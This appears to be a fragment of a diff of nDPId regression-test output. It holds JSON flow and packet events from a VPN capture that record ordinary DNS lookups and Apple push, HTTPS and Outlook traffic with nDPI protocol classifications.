00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1569687267713,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267713,"pkt":"LH6BsEqhNDY7z3UoCABFAAA09sQAAEAG0UAKAADjNApz0t4vAbv\/h0RDal\/Pm4AQD\/4TQgAAAQEIChwN0QUwQSW5"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1569687267764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267764,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAihAAAAQEIChwN0TcGksZO"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267797,"flow_last_seen":1569687267797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267797,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1569687267797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267797,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0xfMAAEAGCEEKAADjETmQdN42FGcxHLjbZd23sYAREACqlQAAAQEIChwN0VbVpVJo"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267677,"flow_last_seen":1569687267677,"flow_idle_time":7560000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1569687267677,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"52.10.115.210","src_port":56879,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1569687267677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1569687267677,"pkt":"LH6BsEqhNDY7z3UoCABFAABb+tIAAEAGzQsKAADjNApz0t4vAbv\/h0Qcal\/PeIAYEACaRQAAAQEIChwN0OQwQN34FwMDACIAAAAAAAAAAwpFwR2TiNxP0z\/UzUIiCJ75mBQ8ToLTjZaT"}
00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1569687267713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569687267713,"pkt":"NDY7z3UoLH6BsEqhCABFAABXHWRAAOsGv300CnPSCgAA4wG73i9qX894\/4dEQ4AYAHaKdwAAAQEICjBBJbkcDdDkFwMDAB60PFmzucBfQdusHvXD0\/WWAM1faNPMBMLPArfIzdE="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1569687267713,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267713,"pkt":"LH6BsEqhNDY7z3UoCABFAAA09sQAAEAG0UAKAADjNApz0t4vAbv\/h0RDal\/Pm4AQD\/4TQgAAAQEIChwN0QUwQSW5"}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1569687267764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267764,"pkt":"2DE0IHf7NDY7z3UoCABFAAA0AABAAEAGJUsKAADjCgAAl94iH3wAQcGNmjQa94AREAAihAAAAQEIChwN0TcGksZO"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267797,"flow_last_seen":1569687267797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267797,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1569687267797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267797,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0xfMAAEAGCEEKAADjETmQdN42FGcxHLjbZd23sYAREACqlQAAAQEIChwN0VbVpVJo"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1569687267799,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1569687267799,"pkt":"LH6BsEqhNDY7z3UoCABFAAA72BEAAP8RQicKAADjS0tLS+u1ADUAJxlWhe8BAAABAAAAAAAAA3d3dwVhcHBsZQNjb20AAAEAAQ=="}
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267799,"flow_last_seen":1569687267799,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1569687267799,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":60341,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"www.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -224,16 +224,16 @@
00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267800,"flow_last_seen":1569687267818,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":331,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1569687267818,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":59582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.sandbox.push.apple.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.188.138.71"}}
00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1569687267819,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1569687267819,"pkt":"NDY7z3UoLH6BsEqhCABFAACwAABAADoRnsRLS0tLCgAA4wA1x3QAnFOt9V6BgAABAAMAAAAACTEtY291cmllcgRwdXNoBWFwcGxlA2NvbQAAAQABwAwABQABAAAYQwAlATESY291cmllci1wdXNoLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA2AAUAAQAAABcAHQ91cy1zdy1jb3VyaWVyLTQKcHVzaC1hcHBsZcBLwGcAAQABAAAAFwAEETmQdA=="}
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267799,"flow_last_seen":1569687267819,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1569687267819,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":51060,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"1-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.116"}}
00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687267820,"pkt":"NDY7z3UoLH6BsEqhCABFAABp+WRAADUGn5oROZB0CgAA4xRn3jZl3bexMRy43IAYARnThAAAAQEICtWmYt0cDdFWFQMDADDYQSIj3jkYV2ViIYpeEoheM2HYhDINcbYvi9M0lKa7pHKjHCudSoLIJkInalaEjXI="}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1569687267820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687267820,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoAABAAEAGjkAKAADjETmQdN42FGcxHLjcAAAAAFAEAAAmugAA"}
00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1569687267820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":119,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":119,"pkt_l4_len":85,"thread_ts_msec":1569687267820,"pkt":"NDY7z3UoLH6BsEqhCABFAABp+WRAADUGn5oROZB0CgAA4xRn3jZl3bexMRy43IAYARnThAAAAQEICtWmYt0cDdFWFQMDADDYQSIj3jkYV2ViIYpeEoheM2HYhDINcbYvi9M0lKa7pHKjHCudSoLIJkInalaEjXI="}
00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267797,"flow_last_seen":1569687267820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1569687267820,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"17.57.144.116","src_port":56886,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1569687267820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1569687267820,"pkt":"LH6BsEqhNDY7z3UoCABFAAAoAABAAEAGjkAKAADjETmQdN42FGcxHLjcAAAAAFAEAAAmugAA"}
00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1569687267824,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"thread_ts_msec":1569687267824,"pkt":"NDY7z3UoLH6BsEqhCABFAACyAABAADoRnsJLS0tLCgAA4wA1+sEAnlIeE96BgAABAAMAAAAACjI0LWNvdXJpZXIEcHVzaAVhcHBsZQNjb20AAAEAAcAMAAUAAQAASVMAJgIyNBJjb3VyaWVyLXB1c2gtYXBwbGUDY29tBmFrYWRucwNuZXQAwDcABQABAAAAGwAdD3VzLXN3LWNvdXJpZXItNApwdXNoLWFwcGxlwE3AaQABAAEAAAAuAAQROZAU"}
00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267805,"flow_last_seen":1569687267824,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1569687267824,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64193,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ApplePush","breed":"Acceptable","category":"Cloud"},"dns": {"query":"24-courier.push.apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.57.144.20"}}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1569687267831,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1569687267831,"pkt":"LH6BsEqhNDY7z3UoCABFAAA3jBMAAP8RjikKAADjS0tLS8J1ADUAI5qcqN8BAAABAAAAAAAABWFwcGxlA2NvbQAAAQAB"}
00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267831,"flow_last_seen":1569687267831,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1569687267831,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267841,"flow_last_seen":1569687267841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267841,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1569687267841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267841,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0KKIAAEAG11YKAADjCCVnxN4nAbsMJdDwho1uAoAR\/\/8iBAAAAQEIChwN0X94psIw"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267841,"flow_last_seen":1569687267841,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267841,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.103.196","src_port":56871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1569687267841,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267841,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0KKIAAEAG11YKAADjCCVnxN4nAbsMJdDwho1uAoAR\/\/8iBAAAAQEIChwN0X94psIw"}
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":117,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":117,"pkt_l4_len":83,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABnAABAADoRnw1LS0tLCgAA4wA1wnUAU2BUqN+BgAABAAMAAAAABWFwcGxlA2NvbQAAAQABwAwAAQABAAAE+gAEEbJgO8AMAAEAAQAABPoABBGOoDvADAABAAEAAAT6AAQRrOAv"}
00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":385,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267831,"flow_last_seen":1569687267847,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569687267847,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":49781,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apple.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.178.96.59"}}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1569687267847,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1569687267847,"pkt":"NDY7z3UoLH6BsEqhCABFAABNAABAADoRnydLS0tLCgAA4wA1yxYAOeBneJ6BgAABAAEAAAAABG1haWwGdmlhc2F0A2NvbQAAAQABwAwAAQABAAAAPAAECCVnxA=="}
@@ -243,17 +243,17 @@
00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267851,"flow_last_seen":1569687267851,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1569687267851,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1569687267865,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1569687267865,"pkt":"NDY7z3UoLH6BsEqhCABFAADYAABAADoRnpxLS0tLCgAA4wA14toAxJ5uzl6BgAABAAcAAAAAA3d3dwdvdXRsb29rA2NvbQAAAQABwAwABQABAAAAzQAUB291dGxvb2sJb2ZmaWNlMzY1wBjALQAFAAEAAABWABkHb3V0bG9vawdtcy1hY2RjBm9mZmljZcAYwE0ABQABAAAHZQAKB3NqYy1lZnrAVcByAAEAAQAAADAABChh3iLAcgABAAEAAAAwAAQ0YAOCwHIAAQABAAAAMAAEKGHdcsByAAEAAQAAADAABDRgEgI="}
00788{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687267851,"flow_last_seen":1569687267865,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":1569687267865,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":58074,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"www.outlook.com","num_queries":1,"num_answers":7,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"40.97.222.34"}}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1569687267881,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267881,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0KOdAAPMG5BAIJWfECgAA4wG73ieGjW4CDCXQ8YAQTdZYOgAAAQEICninPiMcDdF\/"}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687267988,"flow_last_seen":1569687267988,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687267988,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"74.125.197.188","src_port":56874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1569687267988,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267988,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0c9UAAEAG69IKAADjSn3FvN4qAbvQnkCVU\/eYD4AREABMcgAAAQEIChwN0hGhDZLg"}
00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1569687267881,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687267881,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0KOdAAPMG5BAIJWfECgAA4wG73ieGjW4CDCXQ8YAQTdZYOgAAAQEICninPiMcDdF\/"}
